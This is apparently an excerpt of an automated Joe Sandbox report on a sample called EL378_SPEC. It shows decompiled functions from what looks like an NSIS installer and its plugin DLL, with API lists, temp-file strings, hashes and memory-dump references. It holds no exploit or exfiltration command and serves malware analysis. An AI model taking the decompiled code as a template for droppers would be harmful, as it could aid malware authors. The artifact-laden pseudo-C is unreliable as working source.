Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: b8122dede79db05b15fc1f6d098925289f6106e24adecc8a1ca0ec0d6711fe7d
Instruction ID: 11f4ada489f6dc0cedcb2279e09a426cd3a4ff31dad05c15180529db665f632b
Opcode Fuzzy Hash: b8122dede79db05b15fc1f6d098925289f6106e24adecc8a1ca0ec0d6711fe7d
Instruction Fuzzy Hash: 0A114C72608306AFD744DB65CE88A6B7BEDEB88344F04093DB985E62A2D278DD408B55

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC1F7B Relevance: 7.5, APIs: 5, Instructions: 38
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECC1F7B(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t11;

				_t11 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc("true", _t11);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t11, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x6ecc1f92
0x6ecc1fa0
0x6ecc1fab
0x6ecc1fb6
0x6ecc1fbf
0x6ecc1fca

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6ECC1F8C
GlobalAlloc.KERNEL32(?,00000000), ref: 6ECC1F97
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6ECC1FAB
GetProcAddress.KERNEL32(?,00000000), ref: 6ECC1FB6
GlobalFree.KERNEL32(00000000), ref: 6ECC1FBF

Memory Dump Source

Source File: 00000000.00000002.15063213998.000000006ECC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.15063182408.000000006ECC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063255603.000000006ECC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063283859.000000006ECC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_EL378_SPEC.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 0ce167fec3e5b0c036b2b1ff5f9c2d212b70c38e4f7b2ca55ca4f617ef239ae2
Instruction ID: 1e258e56c4af195a958ef3cab051fe43ec5d089ac6801574e06966dc9eba72d4
Opcode Fuzzy Hash: 0ce167fec3e5b0c036b2b1ff5f9c2d212b70c38e4f7b2ca55ca4f617ef239ae2
Instruction Fuzzy Hash: 3BF0C032148518BBCA101AE7DD0CD57BE7DFB8BAFAB164215F629D11A0C9626C018771

Uniqueness

Uniqueness Score: -1.00%

Function 00401DBA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401DBA(void* _a8, struct HWND__* _a12, intOrPtr _a16, struct HWND__* _a20, long _a28, void* _a32, intOrPtr _a36, intOrPtr _a56, signed int _a60) {
				signed char _t23;
				void* _t25;
				long _t26;
				int _t30;
				long _t34;
				intOrPtr _t35;
				int _t47;
				void* _t48;
				int _t52;
				void* _t53;
				int _t55;
				void* _t57;

				_t52 = E00403002(3);
				_a20 = _t52;
				_t34 = E00403002("true");
				_t23 = _a60;
				if((_t23 & 0x00000001) != 0) {
					__esi = E0040303E(__edx, 0x33);
					_a16 = __esi;
				}
				if((_t23 & 0x00000002) != 0) {
					_t34 = E0040303E(_t48, "true");
				}
				_push("true");
				if(_a36 != 0x21) {
					_t53 = E0040303E(_t48);
					_t25 = E0040303E(_t48);
					_t41 =  !=  ? _t25 : 0;
					_t43 =  !=  ? _t53 : 0;
					_t26 = FindWindowExW(_a12, _t34,  !=  ? _t53 : 0,  !=  ? _t25 : 0);
					goto L12;
				} else {
					_a20 = E00403002();
					_t30 = E00403002(2);
					_t47 = _a60 >> 2;
					if(_t47 == 0) {
						_t26 = SendMessageW(_a20, _t30, _t52, _t34);
						L12:
						_a28 = _t26;
					} else {
						SendMessageTimeoutW(_a20, _t30, _t52, _t34, _t55, _t47,  &_a28);
						asm("sbb ebx, ebx");
						_t26 = _a28;
						_a16 = _t34 + 1;
					}
				}
				if( *((intOrPtr*)(_t57 + 0x28)) >= _t55) {
					_push(_t26);
					E0040661F();
				}
				_t35 = _a16;
				 *0x435ac8 =  *0x435ac8 + _t35;
				return 0;
			}

0x00401dc1
0x00401dc5
0x00401dce
0x00401dd0
0x00401dd8
0x00401de1
0x00401de7
0x00401de7
0x00401ded
0x00401df6
0x00401df6
0x00401dfd
0x00401dff
0x00401e57
0x00401e59
0x00401e63
0x00401e6c
0x00401e75
0x00000000
0x00401e01
0x00401e08
0x00401e0c
0x00401e17
0x00401e1c
0x00401e48
0x00401e7b
0x00401e7b
0x00401e1e
0x00401e2c
0x00401e34
0x00401e36
0x00401e3b
0x00401e3b
0x00401e1c
0x00401e83
0x00401afd
0x004016b7
0x004016b7
0x00402ea1
0x00402ea5
0x00402eb7

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48

Strings

!, xrefs: 00401DF8

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 91d7549d19bfd9567b9db0d62f4607727a13d94ab572956bc1fd2bc583f7e011
Instruction ID: 1d489b1cab37c72f7a9fe7ae17229530812e46ff9257658ed8c6d6ee4a6b2e26
Opcode Fuzzy Hash: 91d7549d19bfd9567b9db0d62f4607727a13d94ab572956bc1fd2bc583f7e011
Instruction Fuzzy Hash: 4F21F471609301AFE714AF21C886A2FBBE8EF84755F00093FF585A61E0D6B99D05CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC1F1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECC1F1E(intOrPtr _a4, WCHAR* _a8) {
				intOrPtr _t11;
				intOrPtr _t19;
				WCHAR* _t21;

				_t11 = _a4;
				if( *((intOrPtr*)(_t11 + 4)) != 1) {
					_t21 = _a8;
					_t13 =  ==  ? 0x6ecc40d8 : L"error";
					lstrcpyW(_t21,  ==  ? 0x6ecc40d8 : L"error");
				} else {
					_t19 =  *((intOrPtr*)(_t11 + 0x1c98));
					if(( *(_t11 + 0x1010) & 0x00000100) != 0) {
						_t19 =  *((intOrPtr*)( *((intOrPtr*)(_t11 + 0x100c)) + 1));
					}
					_t21 = _a8;
					wsprintfW(_t21, L"callback%d", _t19);
				}
				return _t21;
			}

0x6ecc1f1e
0x6ecc1f29
0x6ecc1f5c
0x6ecc1f6c
0x6ecc1f71
0x6ecc1f2b
0x6ecc1f35
0x6ecc1f3b
0x6ecc1f43
0x6ecc1f43
0x6ecc1f46
0x6ecc1f51
0x6ecc1f57
0x6ecc1f7a

APIs

wsprintfW.USER32 ref: 6ECC1F51
lstrcpyW.KERNEL32(?,error), ref: 6ECC1F71

Strings

callback%d, xrefs: 6ECC1F4B
error, xrefs: 6ECC1F67, 6ECC1F6F

Memory Dump Source

Source File: 00000000.00000002.15063213998.000000006ECC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.15063182408.000000006ECC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063255603.000000006ECC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063283859.000000006ECC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_EL378_SPEC.jbxd

Similarity

API ID: lstrcpywsprintf
String ID: callback%d$error
API String ID: 2408954437-1307476583
Opcode ID: 8acad3c80ed730f7e5859ce9ed52ab8a51c694225972b1dd147728e4c5abb24c
Instruction ID: aa2366cba5d3002709ffa1de63f4a826054c6ca816404b5c8296208ee2d61147
Opcode Fuzzy Hash: 8acad3c80ed730f7e5859ce9ed52ab8a51c694225972b1dd147728e4c5abb24c
Instruction Fuzzy Hash: 03F08C34244110AFD7048B89D95CDBA73B5FF8AB10F05C1A8F8698B205D770AC468B92

Uniqueness

Uniqueness Score: -1.00%

Function 00406556 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00406556(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x4092b0);
				}
				return _t9;
			}

0x00406557
0x00406565
0x00406566
0x00406571
0x00406579
0x00406579
0x00406582

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403CC3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76A83420,004039C2), ref: 0040655C
CharPrevW.USER32(?,00000000), ref: 00406567
lstrcatW.KERNEL32(?,004092B0), ref: 00406579

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406556

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3355392842
Opcode ID: fdfa961eb15b44997f3f2a02f7ac6fdf64fbe3aae0b57c1f36678e5d22b7198e
Instruction ID: 519304617d09d62b109db9489078dc762d93bb7b848864bf6502fc90c90d6087
Opcode Fuzzy Hash: fdfa961eb15b44997f3f2a02f7ac6fdf64fbe3aae0b57c1f36678e5d22b7198e
Instruction Fuzzy Hash: 3BD05E31502521BBC7029B64AD08D9B7BBCEF46301301446AFA41B3165C7745D41C7ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040285F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040285F(intOrPtr* __edi, void* __ebp, void* _a12, signed int _a20, intOrPtr _a36, void* _a44, intOrPtr _a48, void* _a72, intOrPtr _a80) {
				void* _v4;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr* _t31;
				void* _t33;
				int _t36;
				void* _t40;
				void* _t42;

				_t40 = __ebp;
				_t31 = __edi;
				_t29 = _a36;
				_t30 = _a48;
				_a80 = _t30;
				_t27 = 1;
				_a20 = 0 | _t29 == 0x00000038;
				if(_t30 == 0) {
					if(_t29 != 0x38) {
						_t36 = lstrlenW(E0040303E(_t30, 0x11)) + _t15;
					} else {
						E0040303E(_t30, 0x21);
						E00406469("C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp", 0x40b908, 0x400);
						_t42 = _t42 + 0xc;
						_t36 = lstrlenA(0x40b908);
					}
				} else {
					 *0x40b908 = E00403002(1);
					_pop(_t29);
					_t36 = (_a20 ^ 1) + 1;
				}
				if( *_t31 != _t40) {
					_t33 = E00406C25(_t31);
					if(( *(_t42 + 0x14) |  *(_t42 + 0x50)) != 0 ||  *((intOrPtr*)(_t42 + 0x34)) == _t40 || E00406484(_t33, _t33) >= 0) {
						if(E00406A0B(_t29, _t33, ?str?, _t36) != 0) {
							_t27 =  *((intOrPtr*)(_t42 + 0x10));
						}
					}
				}
				 *0x435ac8 =  *0x435ac8 + _t27;
				return 0;
			}

0x0040285f
0x0040285f
0x0040285f
0x00402865
0x0040286c
0x0040287a
0x0040287b
0x00402881
0x0040289c
0x004028d2
0x0040289e
0x004028a0
0x004028b0
0x004028b5
0x004028bf
0x004028bf
0x00402883
0x0040288f
0x00402895
0x00402896
0x00402896
0x004028d7
0x004028e3
0x004028ed
0x00402912
0x00402ea1
0x00402ea1
0x00402912
0x004028ed
0x00402ea5
0x00402eb7

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll), ref: 004028B9

Strings

C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll, xrefs: 00402870, 0040288F, 004028AA, 004028B8, 00402905
C:\Users\user\AppData\Local\Temp\nsb12B3.tmp, xrefs: 004028AB

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp$C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll
API String ID: 1659193697-3126740342
Opcode ID: 880b6e8eb98c9848af5b495b6728ebb1dd9d1416f486c763179cba2b8671cfc5
Instruction ID: 711803fd364401e957546549a979f7dfd5371b874df28eda27acfe343a1b9a3f
Opcode Fuzzy Hash: 880b6e8eb98c9848af5b495b6728ebb1dd9d1416f486c763179cba2b8671cfc5
Instruction Fuzzy Hash: 9A112676A443116BD310AB618A8992FB7E4AF84354F15453FF905F31C1D7FC980183AE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EF3 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(00000000,?), ref: 00401F4D
LoadImageW.USER32(00000000,?,?,?,?,?), ref: 00401F82
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401F92
DeleteObject.GDI32(00000000), ref: 00401FA1

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: ClientDeleteImageLoadMessageObjectRectSend
String ID:
API String ID: 1043200266-0
Opcode ID: e92525102d7e034d8d28393c65e9fd304b9b50eed0dd5b568055658361e6c855
Instruction ID: f6aed8ae5592713c9fc9c06dd61919a32bd5e077e203486e74a6c7ed28955aaa
Opcode Fuzzy Hash: e92525102d7e034d8d28393c65e9fd304b9b50eed0dd5b568055658361e6c855
Instruction Fuzzy Hash: AD21C072608302AFD300DF65DD84A6BB7E8EB88305F04093EF945E62A2D278DD408B55

Uniqueness

Uniqueness Score: -1.00%

Function 00402077 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402077(intOrPtr _a8, signed char _a28, intOrPtr _a32, char _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char* _a80, signed char _a84, void* _a104, void* _a108) {
				void* _v12;
				intOrPtr _t19;
				void* _t31;
				void* _t37;
				void* _t38;
				void* _t42;

				_t31 = E0040303E(_t37, _t42);
				_t19 = E0040303E(_t37, 0x31);
				_t38 = E0040303E(_t37, 0x22);
				E0040303E(_t37, 0x15);
				E00405D3A("true", "C:\Users\Arthur\AppData\Local\Temp\nsb12B3.tmp\System.dll");
				_a64 = _a8;
				_a60 = _a32;
				_a84 = _a28;
				_a72 = _t19;
				_t25 =  !=  ? _t31 : 0;
				_a68 =  !=  ? _t31 : 0;
				_a80 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\mnstring";
				_t27 =  !=  ? _t38 : 0;
				_a76 =  !=  ? _t38 : 0;
				if(E004069F3( &_a56) != 0) {
					if((_a84 & 0x00000040) != 0) {
						E00406514(__ecx,  *((intOrPtr*)(__esp + 0x88)));
						_push( *((intOrPtr*)(__esp + 0x88)));
						CloseHandle();
					}
				}
				 *0x435ac8 =  *0x435ac8 + 1;
				return 0;
			}

0x0040207f
0x00402081
0x00402091
0x00402093
0x0040209f
0x004020ac
0x004020b2
0x004020ba
0x004020c1
0x004020c5
0x004020c8
0x004020d1
0x004020d9
0x004020dc
0x004020ec
0x004020f7
0x00402104
0x00402109
0x00402110
0x00402110
0x00402ea1
0x00402ea5
0x00402eb7

APIs

Part of subcall function 00405D3A: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?,00000000,?,?), ref: 00405D6C
Part of subcall function 00405D3A: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?,00000000,?,?), ref: 00405D7E
Part of subcall function 00405D3A: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,?), ref: 00405D99
Part of subcall function 00405D3A: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll), ref: 00405DB1
Part of subcall function 00405D3A: SendMessageW.USER32(?), ref: 00405DD8
Part of subcall function 00405D3A: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
Part of subcall function 00405D3A: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00

Part of subcall function 004069F3: ShellExecuteExW.SHELL32(?), ref: 00406A02

Part of subcall function 00406514: WaitForSingleObject.KERNEL32(?,?), ref: 0040651E
Part of subcall function 00406514: GetExitCodeProcess.KERNEL32(?,?), ref: 00406548

CloseHandle.KERNEL32(?,?), ref: 00402110

Strings

@, xrefs: 004020F2
C:\Users\user\AppData\Local\Temp\mnstring, xrefs: 004020D1
C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll, xrefs: 00402098

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: MessageSend$lstrlen$CloseCodeExecuteExitHandleObjectProcessShellSingleTextWaitWindowlstrcat
String ID: @$C:\Users\user\AppData\Local\Temp\mnstring$C:\Users\user\AppData\Local\Temp\nsb12B3.tmp\System.dll
API String ID: 4079680657-2460674677
Opcode ID: b86d3d0cfabebc589822062b709119d7a8bdb9eb276ec3d07a692ebc5b33ef99
Instruction ID: 7c7d4bc9f8110f395c3ef373be7a4f0c936d35dff6000358c7303bcbf620d08d
Opcode Fuzzy Hash: b86d3d0cfabebc589822062b709119d7a8bdb9eb276ec3d07a692ebc5b33ef99
Instruction Fuzzy Hash: 47118F716083809BC310AF61C98561BBBE5BF84349F00493EF595E72D1DBBC8845CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00403389 Relevance: 6.0, APIs: 4, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403389(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					if( *0x40d970 == 0) {
						_t2 = GetTickCount();
						if(_t2 >  *0x435a00) {
							_t3 = CreateDialogParamW( *0x4349f4, 0x6f, 0, E0040364F, 0);
							 *0x40d970 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040620F(0);
					}
				} else {
					_t6 =  *0x40d970; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x40d970 =  *0x40d970 & 0x00000000;
					return _t6;
				}
			}

0x0040338e
0x004033af
0x004033b9
0x004033c5
0x004033d8
0x004033e1
0x00000000
0x004033e6
0x004033ec
0x004033b1
0x004033b8
0x004033b8
0x00403390
0x00403390
0x00403397
0x0040339a
0x0040339a
0x004033a0
0x004033a7
0x004033a7

APIs

DestroyWindow.USER32(00000000,00403579), ref: 0040339A
GetTickCount.KERNEL32 ref: 004033B9
CreateDialogParamW.USER32(0000006F,00000000,0040364F,00000000), ref: 004033D8
ShowWindow.USER32(00000000,00000005), ref: 004033E6

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 7ff58af3a69088ba52de52b21ac6e50ccae1de6d9f2c722b533f380b119e7b3d
Instruction ID: 0c7035cfe5d59141003efccf1163e7ed1ec08c4572f7111a89f6d0b07e944292
Opcode Fuzzy Hash: 7ff58af3a69088ba52de52b21ac6e50ccae1de6d9f2c722b533f380b119e7b3d
Instruction Fuzzy Hash: 87F098B0981300BBEB24AF60EE4DB5A3AB8B744B03F800979F505B51E1DB795955DA1C

Uniqueness

Uniqueness Score: -1.00%

Function 00406977 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406977(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, short* _a12, char* _a16, int _a20) {
				void* _v8;
				int _v12;
				void* _t20;
				char _t21;
				long _t24;
				char* _t28;

				_v12 = 0x800;
				asm("sbb eax, eax");
				_t20 = E004062D8(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_v8);
				_t28 = _a16;
				if(_t20 != 0) {
					L4:
					_t21 = 0;
					 *_t28 = 0;
				} else {
					_t24 = RegQueryValueExW(_v8, _a12, 0,  &_a20, _t28,  &_v12);
					RegCloseKey(_v8);
					_t21 = 0;
					_t28[0x7fe] = 0;
					if(_t24 != 0 || _a20 != 1 && _a20 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406980
0x0040698d
0x004069a0
0x004069a5
0x004069aa
0x004069e9
0x004069e9
0x004069eb
0x004069ac
0x004069be
0x004069c9
0x004069cf
0x004069d3
0x004069db
0x00000000
0x00000000
0x004069db
0x004069f0

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000800,?,00000800,?,?,?,Call,00000000,00000000,00000002,00405FBE), ref: 004069BE
RegCloseKey.ADVAPI32(?), ref: 004069C9

Strings

Call, xrefs: 0040697C

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
